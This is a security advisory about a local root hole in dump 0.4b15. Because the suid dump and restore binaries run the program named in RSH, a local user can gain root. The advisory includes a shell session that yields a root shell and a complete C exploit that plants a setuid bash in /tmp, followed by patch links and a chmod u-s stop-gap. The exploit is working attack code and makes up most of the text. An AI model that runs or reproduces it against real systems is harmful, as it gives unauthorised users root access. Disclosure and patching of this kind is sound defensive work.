


dump 0.4b15 executes an external program ($RSH) with suid root privilege



Vulnerability

    dump

Affected

    dump-0.4b15

Description

    Mat found the following.  When the Linux dump command is pointed at a
    remote tape (TAPE=host:file) it runs the program named by the RSH
    environment variable to reach "host".  Because dump is installed suid
    root and does not drop privilege first, that user-chosen program runs
    as root.  Example:

        [mat@localhost mat]$ export TAPE=garbage:garbage
        [mat@localhost mat]$ export RSH=/home/mat/execute_this
        [mat@localhost mat]$ cat > /home/mat/execute_this
        #!/bin/sh
        cp /bin/sh /home/mat/sh
        chmod 4755 /home/mat/sh
        [mat@localhost mat]$ chmod 755 /home/mat/execute_this
        [mat@localhost mat]$ /sbin/dump -0 /
          DUMP: Connection to garbage established.
          DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
          DUMP: Date of last level 0 dump: the epoch
          DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
          DUMP: Label: none
        /dev/hda2: Permission denied while opening filesystem
         [mat@localhost mat]$ ls -la /home/mat/sh
         -rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
         [mat@localhost mat]$ /home/mat/sh
         bash# id
         uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)

    This is a quick and dirty exploit:

    /*
    **
    **  dump-0.4b15x.c
    **
    **  dump-0.4b15 exploit:
    **  Redhat 6.2 dump command executes
    **  external program with suid privilege.
    **
    **  affected:
    **     /sbin/dump
    **     /sbin/dump.static
    **     /sbin/restore
    **     /sbin/restore.static
    **
    **  Bug found by mat@hacksware.com
    **
    **  This example was coded by md0claes@mdstud.chalmers.se
    **  It was written for EDUCATIONAL PURPOSES ONLY.
    **
    **
    */


    #include <ctype.h>
    #include <errno.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define RUNME     "/tmp/runme"      /* tmp file */
    #define SUID_PATH "/tmp/superdude" /* the power of root */

    /*
     * Print the command-line help to stdout.
     *
     * pname: argv[0] of this program, echoed in the Usage line.
     * One letter selects which suid binary to target; the table below
     * mirrors the switch in main().
     */
    void usage(char *pname)
    {
        static const char *const targets[] = {
            "  d - exploit /sbin/dump\n",
            "  s - exploit /sbin/dump.static\n",
            "  r - exploit /sbin/restore\n",
            "  p - exploit /sbin/restore.static\n\n",
        };
        size_t i;

        fprintf(stdout, "\nUsage: %s < d | s | r | p >\n\n", pname);
        for (i = 0; i < sizeof(targets) / sizeof(targets[0]); i++)
            fputs(targets[i], stdout);
    }

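    /*
     * Entry point.  argv[1] selects the target binary (see usage()).
     *
     * Flow: write a helper shell script to RUNME, fork, exec the chosen
     * suid dump/restore binary with TAPE and RSH set so it runs RUNME as
     * root, wait for the script to have produced a suid copy of bash at
     * SUID_PATH, then exec that copy.
     *
     * Returns 0 only if execve(SUID_PATH) fails to replace the process;
     * every error path exits 1 with a perror()/message on stderr.
     */
    int main(int argc, char *argv[], char *envp[])
    {
        /*
         * Environment handed to the target.  TAPE=host:file makes dump and
         * restore take the remote-tape path, and RSH names the program they
         * run to reach "host" -- here our script.  execle() walks envp until
         * it finds a NULL entry, so the array must be NULL-terminated (the
         * original listing left the terminator out and read past the array).
         */
        char *bad_env[] = { "TAPE=garbage:garbage", "RSH=" RUNME, NULL };

        /* Script $RSH points at; it runs with the target's effective uid. */
        static const char runbuf[] =
            "#!/bin/sh\n/bin/cp /bin/bash " SUID_PATH "\nchmod 6755 " SUID_PATH "\n";

        char *suid[] = { SUID_PATH, NULL };

        /* argv for the target; defaults to restore.static, overridden below. */
        char *av[] = { "/sbin/restore.static", "restore.static", "-t", "/tmp/foo" };

        struct stat st;
        int fd;
        int tries;
        pid_t pid;
        size_t len = sizeof(runbuf) - 1;   /* do not write the trailing NUL */

        if (argc != 2) {
            usage(argv[0]);
            exit(1);
        }

        /* Cast before tolower(): a negative char is undefined for <ctype.h>. */
        switch (tolower((unsigned char)argv[1][0])) {
        case 'd':
            av[0] = "/sbin/dump";
            av[1] = "dump";
            av[2] = "-0";
            av[3] = "/";
            break;
        case 's':
            av[0] = "/sbin/dump.static";
            av[1] = "dump.static";
            av[2] = "-0";
            av[3] = "/";
            break;
        case 'r':
            av[0] = "/sbin/restore";
            av[1] = "restore";
            break;
        case 'p':
            break;   /* keep the restore.static defaults */
        default:
            usage(argv[0]);
            exit(1);
        }

        /*
         * RUNME is a fixed name in a world-writable directory.  Remove any
         * leftover and create with O_EXCL so a pre-planted symlink at that
         * path cannot redirect the write (O_TRUNC alone would follow it).
         */
        unlink(RUNME);
        if ((fd = open(RUNME, O_WRONLY | O_CREAT | O_EXCL, 0755)) == -1) {
            perror("open " RUNME);
            exit(1);
        }
        if (write(fd, runbuf, len) != (ssize_t)len) {
            perror("write " RUNME);
            close(fd);
            unlink(RUNME);
            exit(1);
        }
        if (close(fd) == -1) {
            perror("close " RUNME);
            unlink(RUNME);
            exit(1);
        }

        if ((pid = fork()) < 0) {
            perror("fork");
            unlink(RUNME);
            exit(1);
        }
        if (pid == 0) {
            /* Child: run the suid target with the poisoned environment. */
            execle(av[0], av[1], av[2], av[3], (char *)NULL, bad_env);
            perror("execle");
            _exit(1);
        }

        /*
         * Parent: wait, bounded, for the script to have produced the suid
         * copy.  The original slept one fixed second and exec'd SUID_PATH
         * blind, which races the child and hides a non-vulnerable target.
         */
        for (tries = 0; tries < 5; tries++) {
            if (stat(SUID_PATH, &st) == 0 && (st.st_mode & S_ISUID))
                break;
            sleep(1);
        }
        unlink(RUNME);

        if (tries == 5) {
            fprintf(stderr, "%s did not produce a suid " SUID_PATH
                            " -- target not vulnerable or not installed suid root?\n",
                    av[0]);
            exit(1);
        }

        fprintf(stdout, "\nExploited %s \n", av[0]);
        fprintf(stdout, "Running " SUID_PATH "\n");
        if (execve(SUID_PATH, suid, envp) == -1) {
            perror("execve " SUID_PATH);
            exit(1);
        }

        exit(0);
    }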

Solution

    This is the location for the latest version

        ftp://ftp.sourceforge.net/pub/sourceforge/dump/

    In the fixed packages dump is no longer installed suid root, which is
    what removes the privilege the $RSH program inherited.  Until you can
    upgrade, an equivalent stop-gap is to clear the setuid bit on the
    affected binaries yourself (chmod u-s /sbin/dump /sbin/dump.static
    /sbin/restore /sbin/restore.static); the only cost is that non-root
    users can no longer run them.

    For RedHat:

        ftp://updates.redhat.com/5.2/alpha/dump-0.4b19-5.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/dump-static-0.4b19-5.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/rmt-0.4b19-5.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/sparc/dump-0.4b19-5.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/dump-static-0.4b19-5.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/rmt-0.4b19-5.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/i386/dump-0.4b19-5.5x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/dump-static-0.4b19-5.5x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/rmt-0.4b19-5.5x.i386.rpm
        ftp://updates.redhat.com/5.2/SRPMS/dump-0.4b19-5.5x.src.rpm
        ftp://updates.redhat.com/6.2/alpha/dump-0.4b19-5.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/dump-static-0.4b19-5.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/rmt-0.4b19-5.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/sparc/dump-0.4b19-5.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/dump-static-0.4b19-5.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/rmt-0.4b19-5.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/i386/dump-0.4b19-5.6x.i386.rpm
        ftp://updates.redhat.com/6.2/i386/dump-static-0.4b19-5.6x.i386.rpm
        ftp://updates.redhat.com/6.2/i386/rmt-0.4b19-5.6x.i386.rpm
        ftp://updates.redhat.com/6.2/SRPMS/dump-0.4b19-5.6x.src.rpm

    All released versions  of Trustix Secure  Linux contain a  version
    of dump that is known to  have a local root exploit.   People with
    untrusted local users should upgrade as soon as possible.  Get the
    packages at:

        ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/
        http://www.trustix.net/download/Trustix/updates/1.1/RPMS/
             dump-0.4b19-2tr.i586.rpm
             rmt-0.4b19-2tr.i586.rpm

    Conectiva's last mandatory update of the dump package brought it up
    to version 0.4b18 with the SUID bits disabled, so those packages are
    not affected by the vulnerability discussed above even though they
    predate 0.4b19.

